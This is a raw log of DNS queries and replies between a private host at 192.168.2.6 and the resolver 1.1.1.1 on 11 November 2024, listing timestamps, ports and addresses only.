Nov 11, 2024 18:13:20.957689047 CET	64257	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.959754944 CET	53	49659	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.960414886 CET	53	63596	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.960712910 CET	51583	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.960964918 CET	62267	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.961258888 CET	53	55305	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.961837053 CET	64773	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.962039948 CET	56513	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.962532043 CET	58877	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.962676048 CET	62717	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.962783098 CET	61432	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.964416981 CET	54746	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.964509964 CET	63698	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.965769053 CET	59144	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.965780020 CET	62361	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:20.967346907 CET	53	59564	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.968791008 CET	53	64257	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.969842911 CET	53	64773	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.970849037 CET	53	51583	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.971854925 CET	53	56513	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.972449064 CET	53	62717	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.975878000 CET	53	62361	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.978838921 CET	53	62267	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.980272055 CET	53	64950	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.983407974 CET	53	59493	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.984894991 CET	53	51997	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.993247986 CET	53	58877	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.996054888 CET	53	61432	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.996068001 CET	53	63698	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.996079922 CET	53	54746	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:20.997947931 CET	53	59144	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.002361059 CET	56126	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.002563953 CET	59897	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.002563953 CET	61137	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.002757072 CET	62589	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.002969980 CET	49275	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.003344059 CET	49229	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.003500938 CET	51969	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.003724098 CET	55386	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.009572029 CET	52439	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.009937048 CET	59849	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.012578011 CET	53189	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.012583971 CET	53	59897	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.013307095 CET	53	61137	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.013318062 CET	53	62589	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.013859987 CET	53	49229	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.013907909 CET	53	56126	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.014342070 CET	53	49275	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.016957998 CET	53	55386	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.019013882 CET	53	51969	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.019937038 CET	53	52439	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.020531893 CET	62102	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.021675110 CET	53	59849	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.023207903 CET	53	53189	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.023224115 CET	56072	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.023526907 CET	52357	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.027985096 CET	51764	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.029439926 CET	57253	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.029668093 CET	56918	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.029814959 CET	60618	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.030004025 CET	63058	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.030148983 CET	52581	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.030379057 CET	57561	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.030690908 CET	54308	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.031240940 CET	52451	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.031806946 CET	52764	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.031965971 CET	50773	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.032188892 CET	61155	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.032354116 CET	58268	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.032527924 CET	50442	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.032697916 CET	53	52357	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.035186052 CET	60886	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.036839962 CET	53	60618	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.038153887 CET	53	51764	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.038525105 CET	52625	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.039237022 CET	53	63058	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.040018082 CET	53	57253	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.040457010 CET	53	56918	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.040817976 CET	53	54308	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.041366100 CET	53	52451	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.041847944 CET	53	61155	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.042042971 CET	53	57561	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.043171883 CET	53	58268	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.044856071 CET	51023	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.045110941 CET	53	60886	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.048280001 CET	53	52625	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.052469015 CET	53	50442	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.052735090 CET	53	62102	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.054507971 CET	53	56072	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.054932117 CET	53	51023	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.055917025 CET	54563	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.056135893 CET	60477	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.056303024 CET	52515	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.056463957 CET	56237	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.059804916 CET	60510	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.060257912 CET	53	52581	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.062268972 CET	53	52764	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.063232899 CET	53	50773	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.063271046 CET	53	56237	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.065525055 CET	53	54563	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.065660000 CET	53	60477	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.089909077 CET	53	52515	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.089940071 CET	53	60510	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.195087910 CET	56808	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.204912901 CET	53	56808	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.583712101 CET	62579	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.583712101 CET	65288	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.584115982 CET	58677	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.584563971 CET	51106	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.584760904 CET	59391	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.587456942 CET	51117	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.587940931 CET	59233	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.590060949 CET	57039	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.590305090 CET	56713	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.591211081 CET	53548	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.591552019 CET	61887	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.592992067 CET	54588	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.593717098 CET	53	51106	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.594093084 CET	64705	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.594119072 CET	53	58677	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.594435930 CET	63355	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.594841003 CET	53	65288	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.595953941 CET	53	59391	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.597882986 CET	53	51117	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.599559069 CET	53	53548	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.599571943 CET	53	56713	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.600594997 CET	53	57039	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.600606918 CET	53	61887	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.602880955 CET	54389	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.603180885 CET	57007	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.603591919 CET	53	64705	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.603708029 CET	55289	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.603938103 CET	53	54588	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.605036020 CET	53	63355	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.605830908 CET	61314	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.606168985 CET	57933	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.606899977 CET	58316	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.607182026 CET	53	59233	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.607405901 CET	63168	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.607609034 CET	54014	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.608468056 CET	58487	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.613725901 CET	53	54389	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.615206003 CET	53	62579	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.615734100 CET	53	58316	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.616710901 CET	53	61314	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.616724968 CET	53	57933	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.617865086 CET	53	58487	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.624166965 CET	60090	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.624166965 CET	50845	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.625124931 CET	53	63168	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.625750065 CET	62585	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.634761095 CET	53	55289	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.635279894 CET	53	50845	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.635292053 CET	53	57007	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.636116982 CET	53	62585	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.638925076 CET	53	54014	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.642026901 CET	53	60090	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.708101034 CET	59150	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.708466053 CET	62375	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.708748102 CET	54767	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.709260941 CET	64822	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.709593058 CET	61966	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.709892988 CET	52582	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.718420982 CET	53	54767	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.718466997 CET	53	62375	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.719131947 CET	53	59150	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.728848934 CET	60455	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.728883028 CET	55007	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.729223013 CET	58636	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.729800940 CET	49909	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.729965925 CET	56720	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.730021954 CET	63824	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.730314016 CET	58264	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.730967045 CET	56726	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.732160091 CET	53	61966	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.737859011 CET	53	55007	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.738528967 CET	63541	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.738944054 CET	53	60455	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.739352942 CET	53	49909	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.740489960 CET	52110	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.740731001 CET	62688	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.740778923 CET	56634	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.740890980 CET	53	63824	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.740909100 CET	53	58636	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.740984917 CET	53	52582	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.740997076 CET	53	64822	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.741097927 CET	57094	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.741472006 CET	53	58264	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.746057987 CET	54423	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.746234894 CET	56066	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.746397018 CET	65212	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.746539116 CET	58527	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.747323990 CET	57227	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.747936010 CET	57550	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.748507023 CET	53	56726	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.749114037 CET	61414	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.749296904 CET	63928	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.749669075 CET	54074	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.749849081 CET	56937	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.749999046 CET	55348	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.750443935 CET	53	63541	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.750540018 CET	58576	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.750693083 CET	53	52110	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.750963926 CET	53	57094	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.752296925 CET	59563	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.752521992 CET	59723	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.752737999 CET	53	62688	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.752902985 CET	50276	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.756337881 CET	53	54423	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.756525993 CET	53	56066	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.756540060 CET	53	65212	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.757477045 CET	53	58527	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.757631063 CET	53	57227	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.758681059 CET	53	56937	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.759282112 CET	53	59723	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.759999037 CET	53	55348	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.760024071 CET	53	54074	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.760956049 CET	53	56720	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.763142109 CET	53	59563	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.764559031 CET	53	50276	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.767045021 CET	53	61414	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.770196915 CET	53	63928	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.772232056 CET	53	56634	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.778534889 CET	57368	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.778919935 CET	59968	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.780869961 CET	53	57550	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.782037973 CET	53	58576	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.790100098 CET	53	59968	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.801300049 CET	60588	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.809848070 CET	53	60588	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.809864998 CET	53	57368	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:21.832101107 CET	49361	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:21.842200041 CET	53	49361	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.433587074 CET	54685	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.435877085 CET	54209	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.436326981 CET	62639	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.436570883 CET	62102	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.444658041 CET	53	54685	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.447108030 CET	53	62639	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.450772047 CET	56857	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.457640886 CET	51843	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.460479975 CET	53	56857	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.465400934 CET	63083	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.468046904 CET	53	54209	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.468614101 CET	53	62102	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.468794107 CET	51213	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.468982935 CET	63424	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.475627899 CET	53	63083	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.479010105 CET	53	51213	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.480027914 CET	53	63424	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.489236116 CET	53	51843	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.494199991 CET	51038	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.494453907 CET	53296	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.500756025 CET	55873	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.501085997 CET	65496	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.502243042 CET	55833	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.502454042 CET	51784	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.502543926 CET	64373	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.502717018 CET	61601	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.502875090 CET	63233	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.503802061 CET	50301	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.504542112 CET	61626	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.504832029 CET	53	53296	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.506608009 CET	63968	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.506881952 CET	64121	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.508018970 CET	56810	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.508513927 CET	50468	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.510704041 CET	53	65496	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.511251926 CET	53	55873	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.511255026 CET	59090	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.511492968 CET	55814	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.511934996 CET	53	51784	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.512387037 CET	53	55833	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.512397051 CET	53	51038	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.513252974 CET	53	50301	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.513776064 CET	53	63233	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.517651081 CET	53	56810	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.519325972 CET	53	50468	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.521266937 CET	53	59090	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.521430969 CET	53	55814	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.527525902 CET	53	64121	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.529447079 CET	50163	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.530822039 CET	57214	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.531542063 CET	64542	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.531739950 CET	65239	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.532213926 CET	64603	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.532491922 CET	55978	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.532759905 CET	54450	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.532938957 CET	50416	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.533329964 CET	61736	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.533894062 CET	53	64373	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.533952951 CET	53	61601	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.535325050 CET	60462	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.536997080 CET	53	61626	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.537573099 CET	53	63968	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.540813923 CET	53	65239	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.541431904 CET	60613	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.541654110 CET	55293	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.541842937 CET	58121	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.541982889 CET	53	57214	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.542002916 CET	54308	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.542151928 CET	52126	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.542494059 CET	53	64542	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.542531013 CET	53070	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.542558908 CET	53	54450	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.542678118 CET	56290	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.542809963 CET	53634	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.543843031 CET	65148	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.543934107 CET	52625	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.544044971 CET	60118	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.544159889 CET	61606	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.544332027 CET	54892	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.544497013 CET	54807	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.544527054 CET	55645	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.544779062 CET	55019	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.545032978 CET	50174	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.545213938 CET	62261	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.545368910 CET	61190	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.545531034 CET	53	60462	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.545547009 CET	50670	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.545830011 CET	57028	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.546058893 CET	56281	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.546344042 CET	61792	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.548073053 CET	64701	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.550561905 CET	53	58121	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.551043987 CET	53	55293	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.551783085 CET	53	52625	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.551811934 CET	53	52126	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.551821947 CET	53	56290	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.552357912 CET	53	54308	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.552921057 CET	53	53070	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.553788900 CET	53	65148	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.553800106 CET	53	53634	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.554068089 CET	53	55645	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.554419994 CET	53	61606	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.554514885 CET	53	54892	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.554913044 CET	53	61190	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.555010080 CET	53	62261	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.555126905 CET	53	55019	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.555639029 CET	53	50670	1.1.1.1	192.168.2.6
